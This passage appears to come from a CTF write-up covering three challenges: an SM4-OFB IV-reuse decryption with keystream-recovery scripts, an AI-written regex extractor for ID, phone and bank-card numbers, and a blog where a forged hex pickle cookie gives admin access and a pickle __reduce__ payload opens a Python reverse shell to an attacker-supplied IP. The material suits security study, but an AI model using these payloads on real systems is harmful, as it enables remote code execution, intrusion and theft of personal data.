C_id = unhexlify(record1["id_cipher_hex"])
P_id_padded = pad(record1["id_plain"], BS)
for c, p in zip(split_blocks(C_id), split_blocks(P_id_padded)):
    ks_blocks["id"].append(xor_bytes(c, p))

print("Derived keystream blocks (hex):")
for field, blks in ks_blocks.items():
    print(field, [b.hex() for b in blks])

# 2) Use the derived keystream to decrypt record2's fields
def recover_field(cipher_hex, ks_list):
    C = unhexlify(cipher_hex)
    blocks = split_blocks(C)
    recovered_padded = b''.join(xor_bytes(c, ks) for c, ks in zip(blocks, ks_list))
    # Try to strip the padding and decode
    try:
        recovered = unpad(recovered_padded, BS).decode('utf-8')
    except Exception as e:
        recovered = None
    return recovered, recovered_padded

name_rec, name_padded = recover_field(record2["name_cipher_hex"], ks_blocks["name"])
phone_rec, phone_padded = recover_field(record2["phone_cipher_hex"], ks_blocks["phone"])
id_rec, id_padded = recover_field(record2["id_cipher_hex"], ks_blocks["id"])

print("\nRecovered (if OFB with same IV/key and per-field restart):")
print("Name padded bytes (hex):", name_padded.hex())
print("Name plaintext:", name_rec)
print("Phone padded bytes (hex):", phone_padded.hex())
print("Phone plaintext:", phone_rec)
print("ID padded bytes (hex):", id_padded.hex())
print("ID plaintext:", id_rec)

# If decoding fails, print the raw bytes for manual analysis
# if name_rec is None:
#     print("\nName padded bytes (raw):", name_padded)
# if phone_rec is None:
#     print("Phone padded bytes (raw):", phone_padded)
# if id_rec is None:
#     print("ID padded bytes (raw):", id_padded)
# End

We found that names and ID numbers could be computed. After dumping all names from the Excel sheet into a text file, we had AI write a batch-processing script:

#!/usr/bin/env python3
"""
Batch-decrypt names encrypted with SM4-OFB where the same IV/nonce was reused and one
known plaintext/ciphertext pair is available (from record1).

This script:
- Reads an input file (one hex-encoded cipher per line).
- Uses the known record1 name plaintext & ciphertext to derive the OFB keystream blocks
  for the name field (keystream = C XOR P_padded).
- XORs each input cipher with the derived keystream blocks to recover plaintext, removes
  PKCS#7 padding if present, and prints a line containing: <recovered_name>\t<cipher_hex>

Usage:
    python3 sm4_ofb_batch_decrypt_names.py names_cipher.txt

Notes:
- This assumes each name was encrypted as a separate field starting OFB from the same IV
  (so keystream blocks align for the name field) and PKCS#7 padding was used before
  encryption. If names exceed the number of derived keystream blocks the script will
  attempt to reuse the keystream cyclically (and warn about it), but ideally you should
  supply a longer known plaintext/ciphertext pair to derive more keystream blocks.
- Requires pycryptodome for padding utilities: pip install pycryptodome

Edit the KNOWN_* constants below if your known record1 values differ.
"""

import sys
from binascii import unhexlify, hexlify
from Crypto.Util.Padding import pad, unpad

# -----------------------
# ----- KNOWN VALUES ----
# -----------------------
# These are taken from the CTF prompt / earlier messages. Change them if needed.
KNOWN_NAME_PLAIN = "蒋宏玲" # record1 known plaintext for name field KNOWN_NAME_CIPHER_HEX = "cef18c919f99f9ea19905245fae9574e" # record1 name ciphertext hex IV_HEX = "6162636465666768696a6b6c6d6e6f70" # the IV column (fixed) # Block size for SM4 (16 bytes) BS = 16 # ----------------------- # ----- Helpers --------- # ----------------------- def xor_bytes(a: bytes, b: bytes) -> bytes: return bytes(x ^ y for x, y in zip(a, b)) def split_blocks(b: bytes, bs: int = BS): return [b[i:i+bs] for i in range(0, len(b), bs)] # ----------------------- # ----- Derive keystream from the known pair # ----------------------- def derive_keystream_from_known(known_plain: str, known_cipher_hex: str): p = known_plain.encode('utf-8') c = unhexlify(known_cipher_hex) p_padded = pad(p, BS) p_blocks = split_blocks(p_padded) c_blocks = split_blocks(c) if len(p_blocks) != len(c_blocks): raise ValueError('Known plaintext/cipher block count mismatch') ks_blocks = [xor_bytes(cb, pb) for cb, pb in zip(c_blocks, p_blocks)] return ks_blocks # ----------------------- # ----- Recovery -------- # ----------------------- def recover_name_from_cipher_hex(cipher_hex: str, ks_blocks): c = unhexlify(cipher_hex.strip()) c_blocks = split_blocks(c) # If there are more cipher blocks than ks_blocks, warn and reuse ks cyclically if len(c_blocks) > len(ks_blocks): print("[WARN] cipher needs %d blocks but only %d keystream blocks available; reusing keystream cyclically" % (len(c_blocks), len(ks_blocks)), file=sys.stderr) recovered_blocks = [] for i, cb in enumerate(c_blocks): ks = ks_blocks[i % len(ks_blocks)] recovered_blocks.append(xor_bytes(cb, ks)) recovered_padded = b''.join(recovered_blocks) # Try to unpad and decode; if fails, return hex of raw bytes try: recovered = unpad(recovered_padded, BS).decode('utf-8') except Exception: try: recovered = recovered_padded.decode('utf-8') except Exception: recovered = '<raw:' + recovered_padded.hex() + '>' return recovered # ----------------------- # ----- Main 
----------- # ----------------------- def main(): if len(sys.argv) != 2: print('Usage: python3 sm4_ofb_batch_decrypt_names.py <names_cipher_file>', file=sys.stderr) sys.exit(2) inpath = sys.argv[1] ks_blocks = derive_keystream_from_known(KNOWN_NAME_PLAIN, KNOWN_NAME_CIPHER_HEX) with open(inpath, 'r', encoding='utf-8') as f: for lineno, line in enumerate(f, 1): line = line.strip() if not line: continue # Assume each line is one hex-encoded name ciphertext (no spaces) try: recovered = recover_name_from_cipher_hex(line, ks_blocks) except Exception as e: recovered = '<error: %s>' % str(e) print(f"{recovered}\t{line}") if __name__ == '__main__': main() Searching revealed that the ciphertext corresponding to 何浩璐 was c2de929284bff9f63b905245fae9574e. Searching for the ID number ciphertext corresponding to this in Excel yielded: 1751374401262f5d9ca36576ccde617fad8baace87de269e6659fdbc1f3ea41c. Decrypting this with the above script gave: 120000197404101676. Calculating its MD5: fbb80148b75e98b18d65be446f505fcc gives the Flag. 
dataIdSort

We provided the requirements to AI and had it write a script:

```python
#!/usr/bin/env python3
# coding: utf-8
"""
Purpose:
- Extract from data.txt, in order: ID-card numbers (idcard), phone numbers
  (phone), bank-card numbers (bankcard), IPv4 addresses (ip), and MAC
  addresses (mac).
- Strictly follow the "Personal Information Data Specification", with the
  regexes and matching strategy tuned for high accuracy.
- All matches keep their original formatting and are written to output.csv.
"""

import re
import csv
from datetime import datetime

# ------------------- Configuration -------------------
INPUT_FILE = "data.txt"
OUTPUT_FILE = "output.csv"
DEBUG = False  # set to True to print detailed accept/reject logs

# Whitelist of mobile-number prefixes
ALLOWED_MOBILE_PREFIXES = {
    "134", "135", "136", "137", "138", "139", "147", "148", "150", "151",
    "152", "157", "158", "159", "172", "178", "182", "183", "184", "187",
    "188", "195", "198", "130", "131", "132", "140", "145", "146", "155",
    "156", "166", "167", "171", "175", "176", "185", "186", "196", "133",
    "149", "153", "173", "174", "177", "180", "181", "189", "190", "191",
    "193", "199"
}
# -----------------------------------------------------

# ------------------- Validators -------------------

def luhn_check(digits: str) -> bool:
    """Run the Luhn checksum over a digit string."""
    s = 0
    alt = False
    for char in reversed(digits):
        d = int(char)
        if alt:
            d *= 2
            if d > 9:
                d -= 9
        s += d
        alt = not alt
    return s % 10 == 0

def is_valid_id(raw: str):
    """Validate an ID-card number (length, format, birth date, check digit)."""
    sep_pattern = r'[\s\-\u00A0\u3000\u2013\u2014]'
    s = re.sub(sep_pattern, '', raw)
    if len(s) != 18 or not re.match(r'^\d{17}[0-9Xx]$', s):
        return False, "invalid format or length"
    try:
        birth_date = datetime.strptime(s[6:14], "%Y%m%d")
        if not (1900 <= birth_date.year <= datetime.now().year):
            return False, f"invalid birth year: {birth_date.year}"
    except ValueError:
        return False, "invalid birth date"
    weights = [7, 9, 10, 5, 8, 4, 2, 1, 6, 3, 7, 9, 10, 5, 8, 4, 2]
    check_map = ['1', '0', 'X', '9', '8', '7', '6', '5', '4', '3', '2']
    total = sum(int(digit) * weight for digit, weight in zip(s[:17], weights))
    expected_check = check_map[total % 11]
    if s[17].upper() != expected_check:
        return False, f"check digit mismatch: expected {expected_check}"
    return True, ""

def is_valid_phone(raw: str) -> bool:
    """Validate a mobile number (length and prefix)."""
    digits = re.sub(r'\D', '', raw)
    if digits.startswith("86") and len(digits) > 11:
        digits = digits[2:]
    return len(digits) == 11 and digits[:3] in ALLOWED_MOBILE_PREFIXES

def is_valid_bankcard(raw: str) -> bool:
    """Validate a bank-card number (16-19 pure digits + Luhn)."""
    if not (16 <= len(raw) <= 19 and raw.isdigit()):
        return False
    return luhn_check(raw)

def is_valid_ip(raw: str) -> bool:
    """Validate an IPv4 address (four 0-255 octets, no leading zeros)."""
    parts = raw.split('.')
    if len(parts) != 4:
        return False
    # Reject octets with leading zeros such as '01'
    if any(len(p) > 1 and p.startswith('0') for p in parts):
        return False
    return all(p.isdigit() and 0 <= int(p) <= 255 for p in parts)

def is_valid_mac(raw: str) -> bool:
    """Validate a MAC address."""
    # The regex is already strict; this is just a final confirmation
    return re.fullmatch(r'([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}', raw, re.IGNORECASE) is not None

# ------------------- Regex definitions -------------------
# Pattern order is deliberate, to reduce ambiguity: most specific first.

# 1. MAC address: unambiguous format, colon-separated.
mac_pattern = r'(?P<mac>(?:[0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2})'

# 2. IP address: unambiguous format, dot-separated. This regex is precise
#    and avoids matching invalid addresses such as 256.1.1.1.
ip_pattern = r'(?P<ip>(?<!\d)(?:(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)\.){3}(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(?!\d))'

# 3. ID-card number: 6-8-4 structure with fixed length, more specific than
#    a plain-digit bank card.
sep = r'[\s\-\u00A0\u3000\u2013\u2014]'
id_pattern = rf'(?P<id>(?<!\d)\d{{6}}(?:{sep}*)\d{{8}}(?:{sep}*)\d{{3}}[0-9Xx](?!\d))'

# 4. Bank-card number: 16-19 consecutive digits. One of the most generic
#    long-digit patterns, so it is matched later.
bankcard_pattern = r'(?P<bankcard>(?<!\d)\d{16,19}(?!\d))'

# 5. Phone number: a specific 11-digit format, matched last so it cannot
#    grab the prefix of a longer digit run.
phone_prefix = r'(?:\(\+86\)|\+86\s*)'
phone_body = r'(?:\d{11}|\d{3}[ -]\d{4}[ -]\d{4})'
phone_pattern = rf'(?P<phone>(?<!\d)(?:{phone_prefix})?{phone_body}(?!\d))'

# Compile all patterns into one combined regex
combined_re = re.compile(
    f'{mac_pattern}|{ip_pattern}|{id_pattern}|{bankcard_pattern}|{phone_pattern}',
    flags=re.UNICODE | re.IGNORECASE
)

# ------------------- Main logic -------------------

def extract_from_text(text: str):
    """Find all candidates with the single combined regex and validate each."""
    results = []
    for match in combined_re.finditer(text):
        kind = match.lastgroup
        value = match.group(kind)
        if kind == 'mac':
            if is_valid_mac(value):
                if DEBUG: print(f"[accept mac]: {value}")
                results.append(('mac', value))
            elif DEBUG:
                print(f"[reject mac]: {value}")
        elif kind == 'ip':
            if is_valid_ip(value):
                if DEBUG: print(f"[accept ip]: {value}")
                results.append(('ip', value))
            elif DEBUG:
                print(f"[reject ip]: {value}")
        elif kind == 'id':
            is_valid, reason = is_valid_id(value)
            if is_valid:
                if DEBUG: print(f"[accept idcard]: {value}")
                results.append(('idcard', value))
            else:
                # Fallback: if it fails as an ID card, try it as a bank card
                digits_only = re.sub(r'\D', '', value)
                if is_valid_bankcard(digits_only):
                    if DEBUG: print(f"[accept id->bankcard]: {value}")
                    # The spec requires keeping the original formatting
                    results.append(('bankcard', value))
                elif DEBUG:
                    print(f"[reject id]: {value} (reason: {reason})")
        elif kind == 'bankcard':
            if is_valid_bankcard(value):
                if DEBUG: print(f"[accept bankcard]: {value}")
                results.append(('bankcard', value))
            elif DEBUG:
                print(f"[reject bankcard]: {value}")
        elif kind == 'phone':
            if is_valid_phone(value):
                if DEBUG: print(f"[accept phone]: {value}")
                results.append(('phone', value))
            elif DEBUG:
                print(f"[reject phone]: {value}")
    return results

def main():
    """Read the input file, run extraction, write the CSV."""
    try:
        with open(INPUT_FILE, "r", encoding="utf-8", errors="ignore") as f:
            text = f.read()
    except FileNotFoundError:
        print(f"Error: input file '{INPUT_FILE}' not found. Make sure it exists in the working directory.")
        # Create an empty data.txt so the script can still run
        with open(INPUT_FILE, "w", encoding="utf-8") as f:
            f.write("")
        print(f"An empty '{INPUT_FILE}' has been created. Fill it with the data to analyse.")
        text = ""
    extracted_data = extract_from_text(text)
    with open(OUTPUT_FILE, "w", newline="", encoding="utf-8") as csvfile:
        writer = csv.writer(csvfile)
        writer.writerow(["category", "value"])
        writer.writerows(extracted_data)
    print(f"Done. {len(extracted_data)} valid sensitive items identified; results saved to '{OUTPUT_FILE}'.")

if __name__ == "__main__":
    main()
```

Execution produces output.csv. Uploading it scored an accuracy of at least 98%, which yields the Flag: DASCTF{34164200333121342836358909307523}

ez_blog

Opening the webpage revealed a login requirement. Following the hints, we logged in as a guest with username guest and password guest. We observed a Cookie containing Token=8004954b000000000000008c03617070948c04557365729493942981947d94288c026964944b028c08757365726e616d65948c056775657374948c0869735f61646d696e94898c096c6f676765645f696e948875622e. AI analysis revealed this was a pickle serialization encoded as hex. Decoding the printable bytes showed: KappUser)}(idusernameguesis_admin logged_inub.. We modified the content to change username to admin and is_admin to True, resulting in: 8004954b000000000000008c03617070948c04557365729493942981947d94288c026964944b028c08757365726e616d65948c0561646d696e948c0869735f61646d696e94888c096c6f676765645f696e948875622e. Replacing the request Cookie in BurpSuite successfully granted admin privileges (including article-creation rights). This showed that the server deserializes the Token, so a deserialization vulnerability could be exploited. Since there was no echo, we opted for a reverse shell.
We crafted the Payload:

```python
import pickle
import time
import binascii
import os

class Exploit:
    def __reduce__(self):
        return (os.system, ('''python3 -c "import os
import socket
import subprocess
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('<Your IP>', 2333))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p = subprocess.call(['/bin/sh', '-i'])"''',))

payload = pickle.dumps(Exploit())
hex_token = binascii.hexlify(payload).decode()
print(hex_token)
print(payload)
obj = pickle.loads(payload)
```

Running the script produced the Payload: 80049510010000000000008c05706f736978948c0673797374656d9493948cf5707974686f6e33202d632022696d706f7274206f730a696d706f727420736f636b65740a696d706f72742073756270726f636573730a733d736f636b65742e736f636b657428736f636b65742e41465f494e45542c20736f636b65742e534f434b5f53545245414d290a732e636f6e6e6563742828273c596f75722049503e272c203233333329290a6f732e6475703228732e66696c656e6f28292c2030290a6f732e6475703228732e66696c656e6f28292c2031290a6f732e6475703228732e66696c656e6f28292c2032290a70203d2073756270726f636573732e63616c6c285b272f62696e2f7368272c20272d69275d292294859452942e. After running nc -lvvp 2333 on our server and sending the Payload as the Token, we obtained a shell. The Flag was located in /thisisthefffflllaaaggg.txt:

Flag: DASCTF{15485426979172729258466667411440}
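The guest-to-admin step can also be reproduced offline. The sketch below uses a stand-in `User` class (the server's real class is `app.User`; this local one pickles as `__main__.User`, so it only illustrates the encode/decode round trip the Token cookie performs, not a drop-in forged token):

```python
import pickle
import binascii

class User:
    """Stand-in for the server-side app.User (assumed field layout)."""
    def __init__(self, id, username, is_admin, logged_in):
        self.id = id
        self.username = username
        self.is_admin = is_admin
        self.logged_in = logged_in

# Forge the admin state and hex-encode it the way the Token cookie does
forged = User(2, 'admin', True, True)
token = binascii.hexlify(pickle.dumps(forged)).decode()

# The server-side decode is the inverse: unhexlify, then pickle.loads
obj = pickle.loads(binascii.unhexlify(token))
print(obj.username, obj.is_admin)  # prints: admin True
```

Because the server runs `pickle.loads` on attacker-controlled bytes, the same channel accepts a `__reduce__` gadget, which is exactly what the reverse-shell payload above exploits.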
12/10/2025